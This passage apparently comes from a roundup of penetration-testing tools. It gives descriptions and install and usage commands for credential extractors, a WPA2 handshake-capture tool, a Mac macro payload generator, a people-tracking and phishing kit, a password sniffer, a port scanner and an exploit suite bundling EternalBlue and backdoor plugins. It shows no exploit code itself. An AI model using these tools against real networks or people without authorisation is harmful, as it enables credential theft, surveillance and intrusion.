You can also show options to change information about the modules

Installation using git :

git clone https://github.com/trustedsec/ptf
cd ptf
./ptf

Update:
Just type update in the ptf console.

or download source : v1.14.zip  | v1.14.tar.gz
Source : https://github.com/trustedsec | Our Post Before

swap_digger – tools to automate Linux swap analysis during post-exploitation or forensics.


swap_digger is a bash script used to automate Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web form credentials, web form emails, HTTP basic authentication, Wifi SSIDs and keys, etc.
Features:
+ Linux account clear-text passwords
+ Web login/passwords
+ Email addresses
+ Wifi network SSID and keys
+ GPG private keys
+ Keepass master key
+ Samba credentials

Usage:

git clone https://github.com/sevagas/swap_digger && cd swap_digger
sudo ./swap_digger.sh -vx

Source: https://github.com/sevagas

cylon-raider – a Wireless Attack Lite.


Cylon-Raider is an easy and quick automation of Aircrack-ng “Replay-Attacks”, targeting WPA2-PSK encrypted routers (most home NATed networks and many small businesses). Guaranteed to capture the 4-way handshake of a decently populated router in under 10 minutes (at least 1 or 2 people logged onto the router to properly de-authenticate and listen for their creds).
It can also detect and decloak hidden networks (see UNCLOAK HIDDEN NETWORKS below).

Lightweight Version of Wifi-Attack-Autoloader for Outdated Releases of Kali Nethunter Devices (Python 2.7.9), designed to capture the handshake in record time so you can GTFO out of that area!


RAIDER received a new update on Cinco De Mayo.
+ Substantially simplified menu
+ Less repetitive keystrokes (we all know how lousy tablet keyboards are)
+ Auto-saves the LAST target’s parameters in temporary file(s) to switch between targeting, listening and starting your replay-attack (w/o having to enter your data again)
+ Under the hood, substantially improved and shortened code. In fact most of the modules in the folder are now obsolete, but I keep them around as a resource in case I need something

Raider, will soon be ported to ArmsCommander as a forked-update.
Who is this for?
– Anyone stuck with a crappy Asus Nexus 7 Tablet (2012), or any other device no longer officially supported by the Kali Nethunter Project. It sure kept my crappy tablet useful!
– Anyone dissatisfied with modern GUI versions of Wi-Fi Cracking software (Wifite was supposed to be something awesome, but disappointingly it took damn near forever and did not send enough deauth packets), I can capture the 4-Way WPA2-PSK Handshake in seconds using this, a automated version of Airmon/Aircrack. All it requires is a decent amount of clients on a wireless network for it to work.
– Sometimes referring back to the command line is a way better idea than rely on some GUI crap. It helps you maintain a better understanding of what is going on (or going wrong).

Installation:

cd /tmp
git clone https://github.com/tanc7/Cylon-Raider && cd Cylon-Raider
chmod +x autoInstallerNethunter.sh   # the execute bit is all the installer needs; avoid world-writable 777
./autoInstallerNethunter.sh

Source: https://github.com/tanc7

macphish – Office for Mac OS Macro Payload Generator.


LEGAL DISCLAIMER
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punished by law. This script was built to show how resource files can automate tasks.

macphish is an Office for Mac macro payload generator.
There are 4 attack vectors available:
+ beacon
+ credentials
+ meterpreter
+ meterpreter-grant

For the ‘creds’ method, macphish can generate the AppleScript script directly, in case you need to run it from a shell.

Dependencies:
– Python 2.7.x and macOS

Usage:

git clone https://github.com/cldrn/macphish && cd macphish

To generate the beacon payload:
./macphish.py -a beacon -lh <host>

To generate the macro:
./macphish.py -a creds -m -lh <host>

To generate the AppleScript payload to be executed from a shell:
./macphish.py -a creds -lh <host>

Source: https://github.com/cldrn

trape – People tracker on the Internet.


Disclaimer
This tool has been published for educational purposes in order to teach people how bad guys could track them, monitor them or obtain information from their credentials; we are not responsible for the use or the scope that people may give this project.

We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Trape is a recognition tool that allows you to track people; the information you can get is very detailed. We want to teach the world through this how large Internet companies could monitor you, obtaining information beyond your IP.

trape

Some benefits:
+ One of its most enticing functions is the remote recognition of sessions: you can know where a person has logged in, remotely. This occurs through a bypass of the Same Origin Policy (SOP).
+ Currently you can try everything from a web interface (the console becomes a preview of the logs and actions).
+ Registration of victims, requests and other data are obtained in real time.
+ If you get more information about a person behind a computer, you can generate a more direct and sophisticated attack. Trape was used at some point to track down criminals and learn their behavior.
+ You can do real-time phishing attacks
+ Simple hooking attacks
+ Mapping
+ Important details of the objective
+ Capturing credentials

Usage:

git clone https://github.com/boxug/trape && cd trape
pip install -r requirements.txt
python trape.py -h
Example: python trape.py --url http://localhost --port 8080

Source: https://github.com/boxug


net-creds : Sniffs sensitive data from interface or pcap.


net-creds thoroughly sniffs passwords and hashes from an interface or pcap file. It concatenates fragmented packets and does not rely on ports for service identification.

net-creds

Can Sniff:
+ URLs visited
+ POST loads sent
+ HTTP form logins/passwords
+ HTTP basic auth logins/passwords
+ HTTP searches
+ FTP logins/passwords
+ IRC logins/passwords
+ POP logins/passwords
+ IMAP logins/passwords
+ Telnet logins/passwords
+ SMTP logins/passwords
+ SNMP community string
+ NTLMv1/v2 all supported protocols: HTTP, SMB, LDAP, etc.
+ Kerberos

Usage:

git clone https://github.com/DanMcInerney/net-creds && cd net-creds
pip install -r requirements.txt

Choose the interface to sniff:
sudo python net-creds.py -i eth0

Ignore packets to and from an IP:
sudo python net-creds.py -f 192.168.1.1

Source: https://github.com/DanMcInerney

portSpider is a tool for scanning huge network ranges to find open ports and vulnerable services.


Legal Disclaimer:
The developer and author are not responsible for anything you do with this program, so please only use it for good and educational purposes.

portSpider is a tool for scanning huge network ranges to find open ports and vulnerable services. This tool is not intended to scan one target, but rather a whole IP range (e.g. 192.168.0.0/24). Most of the time companies/organizations have public information about their owned public IP ranges, so portSpider will help you to scan all of their machines at once for vulnerable devices/services.

portSpider v1.0

Modules:
+ http – Scan for open HTTP ports, and get the titles.
+ mysql – Scan for open MySQL servers, and try to log in with the default credentials.
+ mongodb – Scan for open MongoDB instances, and check if they are password protected.
+ ssh – Scan for open SSH ports.
+ printer – Scan for open printer ports and websites.
+ gameserver – Scan for open game server ports.
+ manual – Scan custom ports.

Usage:

git clone https://github.com/xdavidhu/portSpider && cd portSpider
pip3 install -r requirements.txt
python3 portSpider.py

Source: https://github.com/xdavidhu

roxysploit is a community-supported, open-source penetration testing suite.


Legal Disclaimer:
The author does not hold any responsibility for the bad use of this tool; remember that attacking targets without prior consent is illegal and punished by law.

roxysploit is a community-supported, open-source penetration testing suite that supports attacks for numerous scenarios, for conducting attacks in the field.

roxysploit

Plugins in roxysploit:
+ Scan is an automated information gathering plugin; it gives the user the ability to have a rest while the best information gathering plugin is executed.
+ Jailpwn is a useful plugin for any iPhone device that has been jailbroken; it will attempt to log in to SSH using its default password, giving you a full shell.
+ Eternalblue is a recent plugin we added; it exploits a vulnerability in the SMBv1/SMBv2 protocols. These were collected from the NSA cyberweapons.
+ Internalroute exploits multiple vulnerabilities in routers; this can become very useful, for example on hotel Wi-Fi.
+ Aurora is an old plugin that can become very useful for pen-testers; it exploits an Internet Explorer 6 URL vulnerability.
+ Doublepulsar gives you the ability to remotely inject a malicious DLL backdoor into a Windows computer.
+ Kodi is a fantastic movie streaming platform; however, it runs on Linux, and we have created a malicious addon (backdoor) via kodi.tv.
+ Bleed uses a mass vulnerability check to find any SSL vulnerabilities.
+ Tresspass is a way of managing your PHP backdoor and gaining a shell or even running single commands; it requires password authentication, stopping any lurker.
+ Handler is commonly used to create a listener on a port.
+ Poppy is a MITM plugin allowing you to ARP spoof and sniff unencrypted passwords on all protocols such as FTP and HTTP.
+ Redcarpet is a nice plugin keeping you safe from malicious hackers; it will encrypt a user directory.
+ Picklock is a local bruteforce plugin with which you can picklock/bruteforce multiple devices’ pincodes, such as Android USB debugging.
+ Passby can load a USB to steal all credentials from a Windows computer in seconds.
+ Dnsspoof is common for man-in-the-middle attacks; it can redirect any HTTP requests to your DNS.
+ Smartremote is more of a funny remote exploit: you can take over a smart TV’s remote control without authentication.
+ Blueborne is a recent Bluetooth memory leak affecting all devices, even cars.
+ Credswipe: you have to have a card reader to clone them.
+ Rfpwn: a suitable device to bruteforce a special AM OOK or raw binary signal.
+ Ftpbrute: brute-force attack an FTP (file transfer protocol) server.
+ Wifijammer: you can deauth Wi-Fi networks around your area, meaning disconnecting all users connected to the network.

What operating systems support roxysploit?
– All Linux distros are currently supported

Usage:

git clone https://github.com/Eitenne/roxysploit && cd roxysploit
chmod +x install
sudo ./install
sudo rscf

Source: https://github.com/Eitenne

Grouper – A PowerShell script for helping to find vulnerable settings in AD Group Policy.


Grouper is a slightly wobbly PowerShell module designed for pentesters and redteamers (although probably also useful for sysadmins) which sifts through the (usually very noisy) XML output from the Get-GPOReport cmdlet and identifies all the settings defined in Group Policy Objects (GPOs) that might prove useful to someone trying to do something fun/evil.

Grouper

Examples of the kinds of stuff it finds in GPOs:
+ GPOs which grant modify permissions on the GPO itself to non-default users.
+ Startup and shutdown scripts
   – arguments and the scripts themselves often include creds.
   – scripts are often stored with permissions that allow you to modify them.
+ MSI installers being automatically deployed
   – again, often stored somewhere that will grant you modify permissions.
+ Good old fashioned Group Policy Preferences passwords.
+ Autologon registry entries containing credentials.
+ Other creds being stored in the registry for fun stuff like VNC.
+ Scheduled tasks with stored credentials.
   – also often run stuff from poorly secured file shares.
+ User Rights
   – handy to spot where admins accidentally granted ‘Domain Users’ RDP access or those fun rights that let you run mimikatz even without full admin privs.
+ Tweaks to local file permissions
   – good for finding those machines where the admins just stamped “Full Control” for “Everyone” on “C:\Program Files”.
+ File Shares
+ INI Files
+ Environment Variables
+ … and much more! (well, not very much, but some)

Yes it’s pretty rough, but it saves me an enormous amount of time reading through those awful 150MB HTML GPO reports, and if it works for me it might work for you.

Note: While some function names might include the word audit, Grouper is explicitly NOT meant to be an exhaustive audit for best practice configurations etc. If you want that, you should be using Microsoft SCT and LGPO.exe or something.

TODO:
– Add explanations to each check function to provide guidance on what to look for to see if a thing is vulnerable, how to exploit vulnerable configs, etc.
– Remove reliance on RSAT/Group Policy cmdlets to generate the initial report or fold the required code into this script so it can be run on any machine with PS installed.
– Implement more checks to separate ‘could be bad’ configurations from ‘almost certainly bad’.
– Implement checks for some of the more common non-default Group Policy templates, e.g. MS Office, Citrix, etc.

Use and download:

git clone https://github.com/l0ss/Grouper && cd Grouper
Import-Module grouper.ps1

Example:
Invoke-AuditGPReport test_report.xml -showDisabled

Source: https://github.com/l0ss

LaZagneForensic – Decrypt Windows Credentials from another host.


Disclaimer: Do Not Use this program for illegal purposes!

LaZagne (https://github.com/AlessandroZ/LaZagne) uses an internal Windows API called CryptUnprotectData to decrypt user passwords. This API has to be called within the victim user’s session; otherwise it does not work. So if the computer has not been started (when the analysis is performed on an offline mounted disk), or if we do not want to drop a binary on the remote host, no passwords can be retrieved.

LaZagneForensic

LaZagneForensic has been created to avoid this problem. This work has been mainly inspired by the awesome work done by Jean-Michel Picod for DPAPICK and Francesco Picasso for Windows DPAPI laboratory (https://github.com/dfirfpi/dpapilab).

Note: the main problem is that to decrypt these passwords, the user’s Windows password is needed.

Usage:

git clone https://github.com/AlessandroZ/LaZagneForensic && cd LaZagneForensic
pip install -r requirements.txt
pip install pycrypto pyzt

First way - dump configuration files from the remote host using the PowerShell script:
cd dump
Import-Module .\dump.ps1

Second way - using the Python script:
python dump.py

Launch LaZagneForensic with the password, if you have it:
python laZagneForensic.py all -remote /tmp/dump -password 'ZapataVive'

Launch LaZagneForensic without the password:
python laZagneForensic.py all -remote /tmp/dump

Source: https://github.com/AlessandroZ
